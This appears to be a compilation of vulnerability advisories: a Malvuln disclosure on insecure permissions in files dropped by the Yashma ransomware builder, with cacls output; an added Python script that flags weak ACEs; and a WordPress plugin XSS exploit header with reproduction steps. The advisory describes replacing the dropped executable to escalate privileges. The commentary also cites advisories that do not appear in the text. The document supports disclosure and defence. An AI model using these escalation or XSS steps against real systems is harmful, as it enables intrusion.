<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/13e878ed7e547523cffc5728f6ba4190.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Yashma Ransomware Builder v1.2<br />Vulnerability: Insecure Permissions<br />Description: The malware creates PE files with insecure permissions when writing to the root of the C: drive: change (C) permission is granted to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable, then wait for a privileged user to log on to the infected machine to potentially escalate privileges.<br />Family: Yashma<br />Type: PE32<br />MD5: 13e878ed7e547523cffc5728f6ba4190<br />Vuln ID: MVID-2022-0613<br />Disclosure: 06/23/2022<br /><br /><br />Exploit/PoC:<br />C:\>cacls hate.exe<br />C:\hate.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir hate.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />05/14/2022 01:20 AM 54,784 hate.exe<br /> 1 File(s) 54,784 bytes<br /></code></pre>
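All four Malvuln advisories above rest on the same evidence: a cacls line granting C (change) to NT AUTHORITY\Authenticated Users on something the malware dropped into C:\. The script below is an added example, not from the advisories: it parses cacls output and flags write-capable permissions held by low-privilege groups. The two SAMPLE listings are the cacls output printed in the Infector.420 and IMB advisories; the low-privilege group list, the WRITE_CAPABLE set and the assumption that the path on the first output line contains no spaces are mine. Note the (ID) flag on every weak ACE: the permission is inherited from the parent directory's ACL (the root of the system drive, whose default ACL gives Authenticated Users modify rights on subfolders and files) rather than set by the malware itself, which is why dropping files straight into C:\ is enough to produce this condition.

```python
"""Flag weak ACEs in cacls output.

Added example, not part of the Malvuln advisories. SAMPLE_FILE and
SAMPLE_DIR are the cacls listings printed in the Infector.420 and IMB
advisories; the group list, the permission set and the no-spaces-in-path
assumption for the first line are this example's own.
"""
import re
from dataclasses import dataclass

WRITE_CAPABLE = {"F", "C", "W"}   # Full, Change, Write: enough to rename or replace the file
LOW_PRIVILEGE = {
    "nt authority\\authenticated users",
    "builtin\\users",
    "everyone",
    "nt authority\\interactive",
}

# The first line of cacls output carries the path before the first ACE (assumed to contain no spaces)
PATH_PREFIX = re.compile(r"^[A-Za-z]:\\\S*\s+")
# DOMAIN\Name:(FLAG)(FLAG)Perm, e.g. NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C
ACE_LINE = re.compile(r"^(?P<principal>[^:\\]+\\[^:]+?|Everyone):(?P<flags>(?:\([A-Z]+\))*)(?P<perm>[A-Z])$")


@dataclass(frozen=True)
class Ace:
    principal: str
    flags: tuple
    perm: str

    @property
    def inherited(self) -> bool:
        return "ID" in self.flags

    @property
    def weak(self) -> bool:
        return self.principal.lower() in LOW_PRIVILEGE and self.perm in WRITE_CAPABLE


def parse_cacls(output: str) -> list:
    """Return the ACEs in a cacls listing; prompts and dir output are skipped.

    Entries cacls prints as multi-line "special access" lists are not handled.
    """
    aces = []
    for raw in output.splitlines():
        line = PATH_PREFIX.sub("", raw.strip(), count=1)
        m = ACE_LINE.match(line)
        if m:
            flags = tuple(re.findall(r"\(([A-Z]+)\)", m["flags"]))
            aces.append(Ace(m["principal"], flags, m["perm"]))
    return aces


def weak_aces(output: str) -> list:
    return [a for a in parse_cacls(output) if a.weak]


def report(output: str) -> list:
    """One finding per weak ACE, noting whether it was inherited (ID) or set on the object."""
    lines = []
    for a in weak_aces(output):
        origin = "inherited from the parent directory" if a.inherited else "set explicitly on the object"
        lines.append(f"{a.principal} has {a.perm} ({origin})")
    return lines


SAMPLE_FILE = """\
C:\\>cacls Infector.420
C:\\Infector.420 BUILTIN\\Administrators:(ID)F
                NT AUTHORITY\\SYSTEM:(ID)F
                BUILTIN\\Users:(ID)R
                NT AUTHORITY\\Authenticated Users:(ID)C
"""

SAMPLE_DIR = """\
C:\\>cacls IMB
C:\\IMB BUILTIN\\Administrators:(OI)(CI)(ID)F
       NT AUTHORITY\\SYSTEM:(OI)(CI)(ID)F
       BUILTIN\\Users:(OI)(CI)(ID)R
       NT AUTHORITY\\Authenticated Users:(ID)C
       NT AUTHORITY\\Authenticated Users:(OI)(CI)(IO)(ID)C
"""

if __name__ == "__main__":
    for name, sample in (("Infector.420", SAMPLE_FILE), ("IMB", SAMPLE_DIR)):
        print(name)
        for finding in report(sample):
            print("  " + finding)
```

On a live system, pipe `cacls <path>` (or `icacls`, after adjusting ACE_LINE for its `principal:(flags)(perm)` layout) into `report()`; an inherited weak ACE points at the parent directory's ACL as the thing to fix, an explicit one at the dropper itself.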
<pre><code># Exploit Title: WordPress Plugin Download Manager - Cross-Site Scripting<br /># Date: 2022-06-16<br /># Exploit Author: Andrea Bocchetti<br /># Vendor Homepage: https://wordpress.org/plugins/download-manager/<br /># Version: <= 3.2.43<br /># Tested on: Windows<br /># CVE: CVE-2022-2101<br /><br />######## Description ########<br /># 1-) Log in to WordPress and open the plugin's page<br /># 2-) Put the XSS payload in the "Insert URL" field<br /># 3-) Click the resulting link; the JavaScript payload is executed.<br /></code></pre>